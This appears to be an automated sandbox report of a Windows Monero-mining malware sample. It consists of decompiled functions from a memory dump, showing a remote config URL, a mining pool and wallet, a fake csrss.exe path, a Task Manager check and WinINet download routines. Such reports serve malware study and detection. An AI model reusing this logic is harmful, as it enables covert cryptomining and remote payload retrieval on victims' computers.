                                                                                                                                          • String ID: --show-window$3.1.0$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW$C:\ProgramData\LKBNMTFJgl$FALSE$FALSE$FALSE$LKBNMTFJgl$csrss.exe$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$e9c1286a28d82a2d0ee6$http://45.144.225.135/config.txt$pool.supportxmr.com:3333$taskmgr.exe$viTRMUuKeV$viTRMUuKeV
                                                                                                                                          • API String ID: 3615071802-2903677349
                                                                                                                                          • Opcode ID: fde4af4600ce84402bad7013a6c97d4e7067f55479b91411fc77e2e761f43a01
                                                                                                                                          • Instruction ID: 0f7acb865b928a2d4ad8197b38984dbee25a588df8e0cb32863ecd52f8484b33
                                                                                                                                          • Opcode Fuzzy Hash: fde4af4600ce84402bad7013a6c97d4e7067f55479b91411fc77e2e761f43a01
                                                                                                                                          • Instruction Fuzzy Hash: 78F16CF9E40705ABEB30FBADFC06F9E7278BB84741F480160E905E5162EB749644CB52
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D3220, Relevance: 61.5, APIs: 3, Strings: 32, Instructions: 237COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                          			E035D3220(void* __ecx, void* __esi, void* __eflags) {
				intOrPtr _t10;
				intOrPtr _t14;
				void* _t17;
				intOrPtr _t19;
				intOrPtr _t27;
				void* _t31;
				void* _t35;
				long _t37;
				short _t38;
				void* _t41;
				void* _t43;
				struct HINSTANCE__* _t44;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t48;
				struct HINSTANCE__* _t50;
				struct HINSTANCE__* _t52;
				struct HINSTANCE__* _t54;
				intOrPtr _t56;
				struct HINSTANCE__* _t58;
				struct HINSTANCE__* _t60;
				void* _t67;
				void* _t70;
				void* _t73;

				_t67 = __esi;
				_t43 = __ecx;
				 *0x37a1300 = 0;
				 *0x37a1304 = 0;
				 *0x37a1308 = 0;
				 *0x37a130c = 0;
				 *0x37a1310 = 0x7530;
				 *0x37a1238 = 0x5f;
				 *0x37a12bc = 0x18;
				 *0x37a19ac = 0x20;
				 *0x37a19b0 = 5;
				 *0x37a1318 = 0;
				 *0x37a131c = 0;
				 *0x37a1320 = 0;
				 *0x37a1bb8 = 1;
				 *0x37a1bbc = 0xa;
				 *0x37a1bc0 = 0;
				 *0x37a1c24 = 0;
				 *0x37a210c = 1;
				E035D1BB0(0x37a208c, 0, 0x80);
				E035D17E0(0x37a208c, "[no-email]");
				E035D17E0("d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID_ERROR");
				asm("xorps xmm0, xmm0");
				 *0x37a1c48 = 0;
				asm("movups [0x37a1c28], xmm0");
				asm("movups [0x37a1c38], xmm0");
				E035D1BB0("C:\ProgramData\LKBNMTFJgl", 0, 0x208);
				E035D1BB0("csrss.exe", 0, 0x60);
				asm("xorps xmm0, xmm0");
				asm("movups [0x37a158c], xmm0");
				asm("movups [0x37a159c], xmm0");
				E035D1BB0(0x37a19b4, 0, 0x200);
				E035D1BB0(0x37a12c0, 0, 0x40);
				E035D1640(0x37a12c0, 0x35d9df0, 0x40);
				E035D1BB0("http://45.144.225.135/config.txt", 0, 0x200);
				_t10 =  *0x37a19ac; // 0x20
				E035D1640("http://45.144.225.135/config.txt", 0x35d9e30, _t10 + 1);
				E035D1BB0("FALSE", 0, 0x200);
				_t14 =  *0x37a19b0; // 0x5
				E035D1640("FALSE", "FALSE", _t14 + 1);
				_t17 = E035D17B0("FALSE", "http://45.144.225.135/config.txt");
				_t73 = _t70 + 0x90;
				if(_t17 != 0) {
					E035D1CE0("0125789244697858", 0x10, "http://45.144.225.135/config.txt",  *0x37a19ac);
					_t41 = E035D17B0("FALSE", "FALSE");
					_t73 = _t73 + 0x18;
					if(_t41 != 0) {
						E035D1CE0("0125789244697858", 0x10, "FALSE",  *0x37a19b0);
						_t73 = _t73 + 0x10;
					}
				}
				_t19 = E035D8270(_t43, GetCurrentProcess());
				 *0x37a1314 = _t19;
				if(_t19 != 0) {
					E035D8DD0();
					_t60 =  *0x37a1318; // 0x0
					_t61 =  ==  ? 1 : _t60;
					 *0x37a1318 =  ==  ? 1 : _t60;
				}
				_push(_t67);
				E035D17B0("TRUE", "TRUE");
				_t44 =  *0x37a1300; // 0x1
				_t45 =  ==  ? 1 : _t44;
				 *0x37a1300 =  ==  ? 1 : _t44;
				E035D17B0("TASKMGR", "TASKMGR");
				_t46 =  *0x37a1304; // 0x1
				_t47 =  ==  ? 1 : _t46;
				 *0x37a1304 =  ==  ? 1 : _t46;
				E035D17B0("1THREAD", "50%CPU");
				_t48 =  *0x37a1308; // 0x2
				_t49 =  ==  ? 1 : _t48;
				 *0x37a1308 =  ==  ? 1 : _t48;
				E035D17B0("50%CPU", "50%CPU");
				_t50 =  *0x37a1308; // 0x2
				_t51 =  ==  ? 2 : _t50;
				 *0x37a1308 =  ==  ? 2 : _t50;
				E035D17B0("100%CPU", "50%CPU");
				_t52 =  *0x37a1308; // 0x2
				_t53 =  ==  ? 3 : _t52;
				 *0x37a1308 =  ==  ? 3 : _t52;
				E035D17B0("100%CPU", "100%CPU");
				_t54 =  *0x37a130c; // 0x1
				_t55 =  ==  ? 1 : _t54;
				 *0x37a1bb4 = 0x1e;
				 *0x37a130c =  ==  ? 1 : _t54;
				E035D1BB0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0, 0x100);
				_t27 =  *0x37a1238; // 0x5f
				E035D1640("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x35d9f40, _t27 + 1);
				E035D1CE0("0125789244697858", 0x10, "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW",  *0x37a1238);
				_t31 = E035D1BE0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW",  *0x37a1238);
				E035D1BB0("pool.supportxmr.com:3333", 0, 0x80);
				_t56 =  *0x37a12bc; // 0x18
				E035D1640("pool.supportxmr.com:3333", 0x35da018, _t56 + 1);
				E035D1CE0("0125789244697858", 0x10, "pool.supportxmr.com:3333",  *0x37a12bc);
				_t35 = E035D1BE0("pool.supportxmr.com:3333",  *0x37a12bc);
				if(_t31 != 0xd82f1fb8 || _t35 != 0x789308d0) {
					ExitProcess(0x27);
				}
				E035D18D0("pool.supportxmr.com:3333", "nicehash.com");
				_t58 =  *0x37a131c; // 0x0
				_t59 =  !=  ? 1 : _t58;
				 *0x37a131c =  !=  ? 1 : _t58;
				_t37 = GetModuleFileNameW(0, "C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", 0x200);
				if(_t37 == 0 || _t37 == 0x200) {
					_t38 = 0;
					 *0x37a1c4c = 0;
					goto L12;
				} else {
					_t38 = E035D8B20("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", "9dbcf183762872d8917b8a19535a0c65");
					if(_t38 == 0) {
						L12:
						 *0x37a1c28 = 0;
						 *0x37a2110 = 0;
						return _t38;
					} else {
						 *0x37a1c48 = 0;
						 *0x37a2110 = 0;
						return _t38;
					}
				}
			}


























                                                                                                                                          0x035d3220
                                                                                                                                          0x035d3220
                                                                                                                                          0x035d322c
                                                                                                                                          0x035d3236
                                                                                                                                          0x035d3240
                                                                                                                                          0x035d324a
                                                                                                                                          0x035d3254
                                                                                                                                          0x035d325e
                                                                                                                                          0x035d3268
                                                                                                                                          0x035d3272
                                                                                                                                          0x035d327c
                                                                                                                                          0x035d3286
                                                                                                                                          0x035d3290
                                                                                                                                          0x035d329a
                                                                                                                                          0x035d32a4
                                                                                                                                          0x035d32ae
                                                                                                                                          0x035d32b8
                                                                                                                                          0x035d32c2
                                                                                                                                          0x035d32cc
                                                                                                                                          0x035d32d6
                                                                                                                                          0x035d32e5
                                                                                                                                          0x035d32f4
                                                                                                                                          0x035d32fe
                                                                                                                                          0x035d3301
                                                                                                                                          0x035d3312
                                                                                                                                          0x035d3319
                                                                                                                                          0x035d3320
                                                                                                                                          0x035d332e
                                                                                                                                          0x035d3338
                                                                                                                                          0x035d3342
                                                                                                                                          0x035d3349
                                                                                                                                          0x035d3350
                                                                                                                                          0x035d3361
                                                                                                                                          0x035d3372
                                                                                                                                          0x035d3383
                                                                                                                                          0x035d3388
                                                                                                                                          0x035d3399
                                                                                                                                          0x035d33aa
                                                                                                                                          0x035d33af
                                                                                                                                          0x035d33c0
                                                                                                                                          0x035d33d2
                                                                                                                                          0x035d33d7
                                                                                                                                          0x035d33dc
                                                                                                                                          0x035d33f0
                                                                                                                                          0x035d33ff
                                                                                                                                          0x035d3404
                                                                                                                                          0x035d3409
                                                                                                                                          0x035d341d
                                                                                                                                          0x035d3422
                                                                                                                                          0x035d3422
                                                                                                                                          0x035d3409
                                                                                                                                          0x035d342d
                                                                                                                                          0x035d3435
                                                                                                                                          0x035d3441
                                                                                                                                          0x035d3443
                                                                                                                                          0x035d3448
                                                                                                                                          0x035d3450
                                                                                                                                          0x035d3453
                                                                                                                                          0x035d3453
                                                                                                                                          0x035d3459
                                                                                                                                          0x035d3464
                                                                                                                                          0x035d3469
                                                                                                                                          0x035d3476
                                                                                                                                          0x035d347e
                                                                                                                                          0x035d3484
                                                                                                                                          0x035d3489
                                                                                                                                          0x035d3496
                                                                                                                                          0x035d349e
                                                                                                                                          0x035d34a4
                                                                                                                                          0x035d34a9
                                                                                                                                          0x035d34b6
                                                                                                                                          0x035d34be
                                                                                                                                          0x035d34c4
                                                                                                                                          0x035d34c9
                                                                                                                                          0x035d34d6
                                                                                                                                          0x035d34e3
                                                                                                                                          0x035d34e9
                                                                                                                                          0x035d34ee
                                                                                                                                          0x035d34fb
                                                                                                                                          0x035d3508
                                                                                                                                          0x035d350e
                                                                                                                                          0x035d3513
                                                                                                                                          0x035d3520
                                                                                                                                          0x035d3523
                                                                                                                                          0x035d3534
                                                                                                                                          0x035d353a
                                                                                                                                          0x035d353f
                                                                                                                                          0x035d3550
                                                                                                                                          0x035d356a
                                                                                                                                          0x035d357a
                                                                                                                                          0x035d358d
                                                                                                                                          0x035d3592
                                                                                                                                          0x035d35a4
                                                                                                                                          0x035d35bb
                                                                                                                                          0x035d35ce
                                                                                                                                          0x035d35dd
                                                                                                                                          0x035d3673
                                                                                                                                          0x035d3673
                                                                                                                                          0x035d35f8
                                                                                                                                          0x035d35fd
                                                                                                                                          0x035d3608
                                                                                                                                          0x035d3617
                                                                                                                                          0x035d361d
                                                                                                                                          0x035d3626
                                                                                                                                          0x035d3657
                                                                                                                                          0x035d3659
                                                                                                                                          0x00000000
                                                                                                                                          0x035d362f
                                                                                                                                          0x035d3639
                                                                                                                                          0x035d3643
                                                                                                                                          0x035d365f
                                                                                                                                          0x035d365f
                                                                                                                                          0x035d3666
                                                                                                                                          0x035d3670
                                                                                                                                          0x035d3645
                                                                                                                                          0x035d3645
                                                                                                                                          0x035d364c
                                                                                                                                          0x035d3656
                                                                                                                                          0x035d3656
                                                                                                                                          0x035d3643

                                                                                                                                          APIs
                                                                                                                                          • GetCurrentProcess.KERNEL32(74B04D40), ref: 035D3426
                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe,00000200), ref: 035D361D
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CurrentFileModuleNameProcess
                                                                                                                                          • String ID: 0125789244697858$0125789244697858$0125789244697858$0125789244697858$100%CPU$100%CPU$100%CPU$1THREAD$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW$50%CPU$50%CPU$50%CPU$50%CPU$9dbcf183762872d8917b8a19535a0c65$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe$FALSE$FALSE$FALSE$FALSE$GUID_ERROR$TASKMGR$TASKMGR$TRUE$TRUE$[no-email]$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$http://45.144.225.135/config.txt$nicehash.com$pool.supportxmr.com:3333$viTRMUuKeV
                                                                                                                                          • API String ID: 2251294070-2292375719
                                                                                                                                          • Opcode ID: f40fce067aaafb12dbee8c88ad6606012ec70c9c9de7a582816dee6f6323b5e3
                                                                                                                                          • Instruction ID: fbc31ea5a7af366ec17aeb5a36bffb653d03ed0415ba1f31da1ef2030f5d902b
                                                                                                                                          • Opcode Fuzzy Hash: f40fce067aaafb12dbee8c88ad6606012ec70c9c9de7a582816dee6f6323b5e3
                                                                                                                                          • Instruction Fuzzy Hash: 0F91BFB8780B016EF764FFA8BD46F1936A0B7C4B81F848208A511696A7DBF99140CB85
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D4B00, Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 266networkCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                          			E035D4B00(void* __ecx, void* __edx, void* __eflags, char* _a4) {
				void* _v8;
				void _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				long _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				char* _v68;
				short _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v108;
				void* _v112;
				long _t54;
				int _t55;
				void* _t61;
				void* _t62;
				void* _t71;
				long _t87;
				char* _t91;
				long _t108;
				void* _t111;
				char* _t118;
				long _t119;
				char* _t123;
				void* _t126;
				void* _t128;
				void* _t134;
				void* _t136;
				void* _t137;
				void* _t138;
				void* _t139;
				void* _t140;

				E035D1BB0( &_v108, 0, 0x38);
				_t118 = _a4;
				_v24 = 0;
				_t108 = 0;
				_v112 = 0x3c;
				_v92 = 0xffffffff;
				_v104 = 0xffffffff;
				_v64 = 0xffffffff;
				_v56 = 0xffffffff;
				_t54 = E035D1850(_t118);
				_t136 = _t134 + 0x10;
				_t55 = InternetCrackUrlA(_t118, _t54, 0,  &_v112);
				if(_t55 != 0) {
					_t123 = E035D15E0(_v92 + 1);
					E035D1BB0(_t123, 0, _v92 + 1);
					E035D1640(_t123, _v96, _v92);
					_t137 = _t136 + 0x1c;
					_t61 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0);
					_v8 = _t61;
					if(_t61 != 0) {
						_t62 = InternetConnectA(_t61, _t123, _v88, 0, 0, 3, 0, 0);
						_v20 = _t62;
						_push(_t123);
						if(_t62 != 0) {
							E035D1510();
							E035D18D0(_t118, "https://");
							_t138 = _t137 + 0xc;
							_v52 = "text/*";
							_v48 = "application/exe";
							_v44 = "application/zlib";
							_t125 =  !=  ? 0x84ecf300 : 0x846cf300;
							_v40 = "application/gzip";
							_v36 = "application/applefile";
							_v32 = 0;
							_t126 = HttpOpenRequestA(_v20, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0);
							_v16 = _t126;
							if(_t126 == 0) {
								L26:
								InternetCloseHandle(_v20);
								InternetCloseHandle(_v8);
								return 0;
							} else {
								_t71 = E035D18D0(_t118, "https://");
								_t139 = _t138 + 8;
								if(_t71 == 0) {
									L10:
									if(HttpSendRequestA(_t126, 0, 0, 0, 0) == 0) {
										goto L25;
									} else {
										_t119 = 0x400;
										_t128 = E035D15E0(0x400);
										_t140 = _t139 + 4;
										if(_t128 == 0) {
											_t126 = _v16;
											goto L25;
										} else {
											do {
												if(InternetReadFile(_v16, _t128 + _t108, _t119,  &_v24) == 0) {
													if(GetLastError() != 0x7a) {
														E035D1510(_t128);
														L23:
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														InternetCloseHandle(_v8);
														return 0;
													} else {
														_t119 = _t119 + 0x400;
														goto L17;
													}
												} else {
													_t87 = _v24;
													if(_t87 == 0) {
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														_t111 = _v8;
														InternetCloseHandle(_t111);
														_t91 = E035D18D0(_t128, ";End");
														if(_t91 != 0) {
															 *_t91 = 0;
															return _t128;
														} else {
															E035D1510(_t128);
															InternetCloseHandle(_v16);
															InternetCloseHandle(_v20);
															InternetCloseHandle(_t111);
															return 0;
														}
													} else {
														_t108 = _t108 + _t87;
														goto L17;
													}
												}
												goto L27;
												L17:
												_t128 = E035D16A0(_t128, _t119 + _t108);
												_t140 = _t140 + 8;
											} while (_t128 != 0);
											goto L23;
										}
									}
								} else {
									_v12 = 0;
									_v28 = 4;
									if(InternetQueryOptionA(_t126, 0x1f,  &_v12,  &_v28) == 0) {
										L25:
										InternetCloseHandle(_t126);
										goto L26;
									} else {
										_v12 = _v12 | 0x00000180;
										if(InternetSetOptionA(_t126, 0x1f,  &_v12, 4) == 0) {
											goto L25;
										} else {
											goto L10;
										}
									}
								}
							}
						} else {
							E035D1510();
							InternetCloseHandle(_v8);
							return 0;
						}
					} else {
						E035D1510(_t123);
						return 0;
					}
				} else {
					return _t55;
				}
				L27:
			}












































                                                                                                                                          0x035d4b10
                                                                                                                                          0x035d4b15
                                                                                                                                          0x035d4b1e
                                                                                                                                          0x035d4b25
                                                                                                                                          0x035d4b27
                                                                                                                                          0x035d4b2e
                                                                                                                                          0x035d4b35
                                                                                                                                          0x035d4b3f
                                                                                                                                          0x035d4b46
                                                                                                                                          0x035d4b4d
                                                                                                                                          0x035d4b52
                                                                                                                                          0x035d4b57
                                                                                                                                          0x035d4b5f
                                                                                                                                          0x035d4b75
                                                                                                                                          0x035d4b7c
                                                                                                                                          0x035d4b88
                                                                                                                                          0x035d4b8d
                                                                                                                                          0x035d4b9d
                                                                                                                                          0x035d4ba3
                                                                                                                                          0x035d4ba8
                                                                                                                                          0x035d4bcb
                                                                                                                                          0x035d4bd1
                                                                                                                                          0x035d4bd4
                                                                                                                                          0x035d4bd7
                                                                                                                                          0x035d4bf4
                                                                                                                                          0x035d4c04
                                                                                                                                          0x035d4c09
                                                                                                                                          0x035d4c0c
                                                                                                                                          0x035d4c15
                                                                                                                                          0x035d4c21
                                                                                                                                          0x035d4c28
                                                                                                                                          0x035d4c2b
                                                                                                                                          0x035d4c38
                                                                                                                                          0x035d4c47
                                                                                                                                          0x035d4c58
                                                                                                                                          0x035d4c5a
                                                                                                                                          0x035d4c5f
                                                                                                                                          0x035d4db8
                                                                                                                                          0x035d4dbb
                                                                                                                                          0x035d4dca
                                                                                                                                          0x035d4dd4
                                                                                                                                          0x035d4c65
                                                                                                                                          0x035d4c6b
                                                                                                                                          0x035d4c70
                                                                                                                                          0x035d4c75
                                                                                                                                          0x035d4cb8
                                                                                                                                          0x035d4cc9
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4ccf
                                                                                                                                          0x035d4ccf
                                                                                                                                          0x035d4cda
                                                                                                                                          0x035d4cdc
                                                                                                                                          0x035d4ce1
                                                                                                                                          0x035d4dad
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4ce7
                                                                                                                                          0x035d4ce7
                                                                                                                                          0x035d4cfb
                                                                                                                                          0x035d4d11
                                                                                                                                          0x035d4d86
                                                                                                                                          0x035d4d8e
                                                                                                                                          0x035d4d9a
                                                                                                                                          0x035d4d9f
                                                                                                                                          0x035d4da2
                                                                                                                                          0x035d4dac
                                                                                                                                          0x035d4d13
                                                                                                                                          0x035d4d13
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4d13
                                                                                                                                          0x035d4cfd
                                                                                                                                          0x035d4cfd
                                                                                                                                          0x035d4d02
                                                                                                                                          0x035d4d31
                                                                                                                                          0x035d4d40
                                                                                                                                          0x035d4d42
                                                                                                                                          0x035d4d46
                                                                                                                                          0x035d4d4e
                                                                                                                                          0x035d4d58
                                                                                                                                          0x035d4d79
                                                                                                                                          0x035d4d84
                                                                                                                                          0x035d4d5a
                                                                                                                                          0x035d4d5b
                                                                                                                                          0x035d4d66
                                                                                                                                          0x035d4d6b
                                                                                                                                          0x035d4d6e
                                                                                                                                          0x035d4d78
                                                                                                                                          0x035d4d78
                                                                                                                                          0x035d4d04
                                                                                                                                          0x035d4d04
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4d04
                                                                                                                                          0x035d4d02
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4d19
                                                                                                                                          0x035d4d23
                                                                                                                                          0x035d4d25
                                                                                                                                          0x035d4d28
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4d2c
                                                                                                                                          0x035d4ce1
                                                                                                                                          0x035d4c77
                                                                                                                                          0x035d4c7a
                                                                                                                                          0x035d4c81
                                                                                                                                          0x035d4c94
                                                                                                                                          0x035d4db0
                                                                                                                                          0x035d4db6
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4c9a
                                                                                                                                          0x035d4c9a
                                                                                                                                          0x035d4cb2
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d4cb2
                                                                                                                                          0x035d4c94
                                                                                                                                          0x035d4c75
                                                                                                                                          0x035d4bd9
                                                                                                                                          0x035d4bd9
                                                                                                                                          0x035d4be5
                                                                                                                                          0x035d4bf3
                                                                                                                                          0x035d4bf3
                                                                                                                                          0x035d4baa
                                                                                                                                          0x035d4bab
                                                                                                                                          0x035d4bbb
                                                                                                                                          0x035d4bbb
                                                                                                                                          0x035d4b66
                                                                                                                                          0x035d4b66
                                                                                                                                          0x035d4b66
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • InternetCrackUrlA.WININET(74B5EA30,00000000,?,?,00000000,00000000), ref: 035D4B57
                                                                                                                                          • InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 035D4B9D
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Internet$CrackOpen
                                                                                                                                          • String ID: ;End$<$GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
                                                                                                                                          • API String ID: 1262293563-2187584305
                                                                                                                                          • Opcode ID: 2a2ff3b97c69296246d7ce3c0724e73ff4e5efdf8073d6574e0077453a923539
                                                                                                                                          • Instruction ID: 6df4c5e6eed5d288d59e0cb944001800a2c8268714f18503078067121f0d76c9
                                                                                                                                          • Opcode Fuzzy Hash: 2a2ff3b97c69296246d7ce3c0724e73ff4e5efdf8073d6574e0077453a923539
                                                                                                                                          • Instruction Fuzzy Hash: C781E571E012096BDB30FBE9FC45FAEB7B8FF44350F140165F904E62A0EB355A158AA0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D7C30, Relevance: 47.5, APIs: 17, Strings: 10, Instructions: 241networkCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                          			E035D7C30(void* __ecx, void* __edx, void* __eflags, char* _a4, intOrPtr* _a8) {
				void _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				long _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				char* _v68;
				short _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v108;
				void* _v112;
				long _t53;
				int _t54;
				void* _t62;
				void* _t63;
				void* _t72;
				long _t88;
				long _t103;
				char* _t108;
				intOrPtr _t109;
				char* _t111;
				void* _t114;
				long _t116;
				void* _t123;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;

				E035D1BB0( &_v108, 0, 0x38);
				_t108 = _a4;
				_v24 = 0;
				_t103 = 0;
				_v112 = 0x3c;
				_v92 = 0xffffffff;
				_v104 = 0xffffffff;
				_v64 = 0xffffffff;
				_v56 = 0xffffffff;
				_t53 = E035D1850(_t108);
				_t125 = _t123 + 0x10;
				_t54 = InternetCrackUrlA(_t108, _t53, 0,  &_v112);
				if(_t54 != 0) {
					_t111 = E035D15E0(_v92 + 1);
					E035D1BB0(_t111, 0, _v92 + 1);
					E035D1640(_t111, _v96, _v92);
					_t126 = _t125 + 0x1c;
					_t62 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0);
					_v20 = _t62;
					if(_t62 != 0) {
						_t63 = InternetConnectA(_t62, _t111, _v88, 0, 0, 3, 0, 0);
						_v16 = _t63;
						_push(_t111);
						if(_t63 != 0) {
							E035D1510();
							E035D18D0(_t108, "https://");
							_t127 = _t126 + 0xc;
							_v52 = "text/*";
							_v48 = "application/exe";
							_v44 = "application/zlib";
							_t113 =  !=  ? 0x84ecf300 : 0x846cf300;
							_v40 = "application/gzip";
							_v36 = "application/applefile";
							_v32 = 0;
							_t114 = HttpOpenRequestA(_v16, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0);
							_v12 = _t114;
							if(_t114 == 0) {
								L24:
								InternetCloseHandle(_v16);
								InternetCloseHandle(_v20);
								return 0;
							} else {
								_t72 = E035D18D0(_t108, "https://");
								_t128 = _t127 + 8;
								if(_t72 == 0) {
									L10:
									if(HttpSendRequestA(_t114, 0, 0, 0, 0) == 0) {
										goto L23;
									} else {
										_t116 = 0x400;
										_t109 = E035D15E0(0x400);
										_t129 = _t128 + 4;
										if(_t109 == 0) {
											_t114 = _v12;
											goto L23;
										} else {
											do {
												if(InternetReadFile(_v12, _t109 + _t103, _t116,  &_v24) == 0) {
													if(GetLastError() != 0x7a) {
														E035D1510(_t109);
														L21:
														InternetCloseHandle(_v12);
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														return 0;
													} else {
														_t116 = _t116 + 0x400;
														goto L15;
													}
												} else {
													_t88 = _v24;
													if(_t88 == 0) {
														InternetCloseHandle(_v12);
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														 *_a8 = _t109;
														return _t103;
													} else {
														_t103 = _t103 + _t88;
														goto L15;
													}
												}
												goto L25;
												L15:
												_t109 = E035D16A0(_t109, _t116 + _t103);
												_t129 = _t129 + 8;
											} while (_t109 != 0);
											goto L21;
										}
									}
								} else {
									_v8 = 0;
									_v28 = 4;
									if(InternetQueryOptionA(_t114, 0x1f,  &_v8,  &_v28) == 0) {
										L23:
										InternetCloseHandle(_t114);
										goto L24;
									} else {
										_v8 = _v8 | 0x00000180;
										if(InternetSetOptionA(_t114, 0x1f,  &_v8, 4) == 0) {
											goto L23;
										} else {
											goto L10;
										}
									}
								}
							}
						} else {
							E035D1510();
							InternetCloseHandle(_v20);
							return 0;
						}
					} else {
						E035D1510(_t111);
						return 0;
					}
				} else {
					return _t54;
				}
				L25:
			}










































                                                                                                                                          0x035d7c40
                                                                                                                                          0x035d7c45
                                                                                                                                          0x035d7c4e
                                                                                                                                          0x035d7c55
                                                                                                                                          0x035d7c57
                                                                                                                                          0x035d7c5e
                                                                                                                                          0x035d7c65
                                                                                                                                          0x035d7c6f
                                                                                                                                          0x035d7c76
                                                                                                                                          0x035d7c7d
                                                                                                                                          0x035d7c82
                                                                                                                                          0x035d7c87
                                                                                                                                          0x035d7c8f
                                                                                                                                          0x035d7ca2
                                                                                                                                          0x035d7cac
                                                                                                                                          0x035d7cb8
                                                                                                                                          0x035d7cbd
                                                                                                                                          0x035d7ccd
                                                                                                                                          0x035d7cd3
                                                                                                                                          0x035d7cd8
                                                                                                                                          0x035d7cfb
                                                                                                                                          0x035d7d01
                                                                                                                                          0x035d7d04
                                                                                                                                          0x035d7d07
                                                                                                                                          0x035d7d23
                                                                                                                                          0x035d7d33
                                                                                                                                          0x035d7d38
                                                                                                                                          0x035d7d3b
                                                                                                                                          0x035d7d44
                                                                                                                                          0x035d7d50
                                                                                                                                          0x035d7d57
                                                                                                                                          0x035d7d5a
                                                                                                                                          0x035d7d67
                                                                                                                                          0x035d7d76
                                                                                                                                          0x035d7d87
                                                                                                                                          0x035d7d89
                                                                                                                                          0x035d7d8e
                                                                                                                                          0x035d7eb2
                                                                                                                                          0x035d7eb5
                                                                                                                                          0x035d7ec3
                                                                                                                                          0x035d7ecd
                                                                                                                                          0x035d7d94
                                                                                                                                          0x035d7d9a
                                                                                                                                          0x035d7d9f
                                                                                                                                          0x035d7da4
                                                                                                                                          0x035d7de7
                                                                                                                                          0x035d7df8
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7dfe
                                                                                                                                          0x035d7dfe
                                                                                                                                          0x035d7e09
                                                                                                                                          0x035d7e0b
                                                                                                                                          0x035d7e10
                                                                                                                                          0x035d7ea7
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7e16
                                                                                                                                          0x035d7e16
                                                                                                                                          0x035d7e2a
